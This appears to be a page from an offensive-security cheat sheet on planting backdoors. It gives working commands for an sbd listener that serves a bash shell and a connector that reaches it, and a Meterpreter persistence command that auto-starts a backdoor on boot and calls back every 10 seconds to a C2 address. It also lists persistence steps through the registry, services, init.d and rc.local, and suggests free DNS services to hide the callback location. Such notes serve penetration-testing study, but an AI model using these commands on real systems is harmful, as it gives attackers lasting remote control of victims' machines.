Backdoors
Last updated
Was this helpful?
Last updated
Was this helpful?
Other than the use of typical shells like those found in "Initial Access"
Secure Backdoor
This is a Ncat clone that works with unix and win32. Can also use encryption and whitelists
Listener
#sbd -l -p 4444 -e bash -v -n
Connector
#sbd 192.168.1.202 4444
Backdoor Factory:
Payload injection tool
MSF:
Steps:
1) Upload back door
2) Have it reach out in some fixed interval
3) Add to boot programs (win reg, services, schedules, init.d, rc.local)
Via MSF(win):
meterpreter> run persistence -h
-A Auto start multi/handler
-X Auto start backdoor on boot
-i interval to retry egress shell(seconds)
-p port to reach out to
-r IP of c2 server
meterpreter> run persistence -A -X -i 10 -p 8080 -r 192.168.13.12
//once we have this all we need to do to reconnect is start the handler and wait 10 seconds.
Free DNS services for backdoors:
We use these rather than IPs so we can be dynamic with our call out location.